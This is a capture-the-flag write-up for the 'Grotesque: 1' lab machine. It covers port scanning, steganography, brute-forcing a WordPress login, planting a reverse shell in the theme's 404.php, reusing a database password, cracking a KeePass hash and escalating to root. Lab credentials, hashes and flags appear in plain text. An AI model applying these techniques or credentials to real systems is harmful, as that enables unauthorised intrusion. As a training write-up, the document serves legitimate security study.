Last updated: 15 Apr 24 09:27:45 (UTC)

Grotesque: 1

Grotesque 1

By Lawcky 05/03/24

Introduction

Grotesque: 1

Difficulty : Medium

Additionnal info :

Name: * Grotesque: 1.0.1*
Release date: 10 Mar 2021
Author: tasiyanci
Series: Grotesque

In this write-up

  • nmap
  • ffuf
  • steganography (binwalk)
  • md5sum & dd
  • wordpress & wpscan
  • RCE
  • Keepass file

Scans

fd642304af23fe4a55c9a707131a732b.png

b1f7574e2ef9e9e83f8960683b128834.png

Write-UP

Information Gathering

ae84fcdb2d448c482d76e98a26f7c845.png

Fuzz : found nothing

port 66 :

277bdf069705bb11f22676c9c329ac93.png

found a download link with a zip file

3b5eb6ff0a646bddf6c573d2620f3b30.png this is a image with potential steganography

Steganography

using binwalk

31c675cbdb9e6b4b5f19a101eca8c840.png

first attempt to decode :

3659e3fa18768dc7175eddfeabe830e7.png

second :

95b20b375c5182480a72904bda9a441c.png this seems to be an equivalent of assembly language??..

all that seems useless

The Project

in the project we find a lot of files inside the _vvmlist with a repeated content

9356077f3a660193e8d38104617261a0.png

lets see if theres anything uniq in these files

in the enormous output we find this

067a33dfc9d08d398a6dd5dfef4c6dd4.png

47ae8d1f981f354f568f5a9bc5fb4a4b.png

since its a wordpress we can easily find the login page :

WPscan

f5e5deb425f8f59212589943ca929d10.png

with apparantly an uppercase password

we now need a username and a uppercase password, wordpress allows user enumeration.

found a valid usernames using author’s name on the site :

377e5e1c9a35e6bb92948bb460dfc6ca.png

now we need a password that seems to be uppercase.

i created a wordlist using cewl than put it all in uppercase using dd

ad86ecc016d5c87067ae7fd1ac344c7b.png

lets try attacking :

693750fee7686a4da6be41bddbdf72c8.png

did not work lets try rockyou using the uppercase command

2a49d15c71a78dfde0fd9f1d108bf5e1.png

the solution was to copy the lyrics of one of the songs in a file and then md5sum it WITH the newline, then uppercase it to get the password… and the only thing that pointed to that direction was a giga chad meme on the site… these chads are too much 😭

6bbf42f376cdef10cf292dfad855066a.png

61163b98284e5dacd28400d5874afdd4.png

i love it

Reverse Shell

injecting the 404.php page aaa770e127a18e075ec12f7aa66730d3.png the page is located at : http://IP/lyricsblog/wp-content/themes/twentytwentyone/404.php aee0b055ebb7d3a022c1e74ebc50afbe.png

Privilege Escalation

found a mysql server in

77f7b7cf6479eba11ece84aa7f56dd81.png

raphael:_double_trouble_ mysql -h localhost -u raphael -p -D wordpress_db

found this :

5ebf502788fa4e8e8220db4d74e52e71.png

erdalkomurcu:$P$BXHQZLhAms.Eo0DzlZRBKbyezUPDqf1

could not break

the users pass on unix was the same as the db password

ddca19dd4002d3ac447c209fa1d8b45c.png

first flag found F6ACB21652E095630BB1BEBD1E587FE7

Keepass

found in the home directory of raphael

b300b16109c4e4e5ad11bc8f89560629.png

its a password manager file

we extract its hash using keepass2john

$keepass$*2*60000*0*d34ff0b3bbce285d4553b994d1377a942145c2066611eeec2b4de8359f92d18c*e1ae12738ee79dabedfaf7f387275bfb4afc77b6943d02c156eabfaac3c2e58b*638b2e50ed9f0e910f7a96dbeb990c6d*4779254b4e0535bbfa31cf2d31a8ef86033ddbc13be2a5b25e9b0b5983448681*d32ea132be90e65089bfb5c7b6fee69019ada50b62d2e11c6d77d92f2856ba1c

then crack it using hashcat

2ba3a3f6fe808662976ea3ac86d89869.png

master password is chatter

root password

cec2ef956308e4f3f5b92721b2256be6.png

root:.:.subjective.:.

b87037c78abcc6f998429f57f94e047f.png

second flag found AF7DD472654CBBCF87D3D7F509CB9862

Joplin Server v2.14.2, copyright © 2021-2024 JOPLIN.